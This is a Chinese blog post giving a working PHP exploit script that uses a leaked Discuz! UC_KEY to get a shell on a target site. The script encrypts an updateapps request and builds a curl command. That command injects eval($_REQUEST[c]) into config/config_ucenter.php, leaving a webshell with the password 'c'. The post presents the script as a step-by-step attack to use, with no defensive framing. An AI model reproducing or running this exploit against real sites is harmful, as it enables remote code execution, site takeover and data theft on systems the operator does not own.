Discuz的利用UC_KEY进行getshellDiscuz的利用UC_KEY进行getshell

生命不息,
折腾不止!
当前位置:首页 > 建站笔记 > Discuz! > Discuz的利用UC_KEY进行getshell

Discuz的利用UC_KEY进行getshell

2019-04-17 20:44:43 分类:Discuz! 阅读() 评论() 来源: 网站纠错

直接读取数据库 pre_ucenter_applications 下的 authkey 即为UC_KEY。长度为64位。

另存为 dz.php
代码如下
把1.com 改成 dz网站的域名 总共2处

 

<?php
 
$key = 'nbv0u3zeZ1jd9bB440faAcV6H5e3Ve11V4i300A8c433L4has5i722h3z7w1K3uc';#少年 uc_key 写在这里
$url = 'http://1.com/ucenter';
$arg = 'action=updateapps&time='.time();#拿webshell:http://localhost/config/config_ucenter.php 密码:c
echo 'curl "'.$url.'?code='.rawurlencode(authcode($arg,'ENCODE',$key)).'" -d "'.addslashes('<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">[url=http://1.com/ucenter]http://1.com/ucenter[/url]\');eval(\$_REQUEST[c]);#</item></root>').'"';
#curl或者用其他工具post提交
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
        $ckey_length = 4;
        $key = md5($key);
        $keya = md5(substr($key, 0, 16));
        $keyb = md5(substr($key, 16, 16));
        $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
        $cryptkey = $keya.md5($keya.$keyc);
        $key_length = strlen($cryptkey);
        $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
        $string_length = strlen($string);
        $result = '';
        $box = range(0, 255);
        $rndkey = array();
        for($i = 0; $i <= 255; $i++) {
                $rndkey[$i] = ord($cryptkey[$i % $key_length]);
        }
        for($j = $i = 0; $i < 256; $i++) {
                $j = ($j + $box[$i] + $rndkey[$i]) % 256;
                $tmp = $box[$i];
                $box[$i] = $box[$j];
                $box[$j] = $tmp;
        }
        for($a = $j = $i = 0; $i < $string_length; $i++) {
                $a = ($a + 1) % 256;
                $j = ($j + $box[$a]) % 256;
                $tmp = $box[$a];
                $box[$a] = $box[$j];
                $box[$j] = $tmp;
                $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
        }
        if($operation == 'DECODE') {
                if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
                        return substr($result, 26);
                } else {
                        return '';
                }
        } else {
                return $keyc.str_replace('=', '', base64_encode($result));
        }
}
?>

 

http://域名/config/config_ucenter.php

赞() 打赏
未经允许不得转载:我的博客 » Discuz的利用UC_KEY进行getshell
分享到: 更多 (0)
标签:

相关推荐

评论 4

取消

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
  1. #1

    这是评论测试

    DUX主题小秘7个月前 (09-17)回复

    • 飞歌导航东方红烦得很

      themebetter主题小秘3周前 (04-08)回复
  2. #2

    这是新的一条评论

    DUX主题小秘7个月前 (09-17)回复
  3. #3

    未来一年,中国的移动支付市场会是什么样?

    DUX主题小秘7个月前 (09-17)回复
您想说的

投诉、建议、问题反馈

您想说的,您建议的...

本站搜索

    全站搜索

站长推荐

热门文章

热门标签

ecms(28个) 帝国cms(27个) 帝国笔记(20个) 调用(8个) 插件(6个) 内容页(5个) 工具(4个) discuz(4个) 自定义列表(4个) 标签(4个) 留言(3个) linux(3个) 规则(3个) 访问(3个) 白名单(3个) 端口(3个) 防火墙(3个) ipset(3个) office(3个) WPS(3个) 评论(3个) php(3个) 搜索(3个) tags(3个) 刷新首页(2个) 数据更新(2个) 栏目(2个) 样式(2个) 附件(2个) 模板(2个) 帝国(2个) 目录列表(2个) 单页面(2个)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

大前端WP主题 更专业 更方便

联系我们 联系我们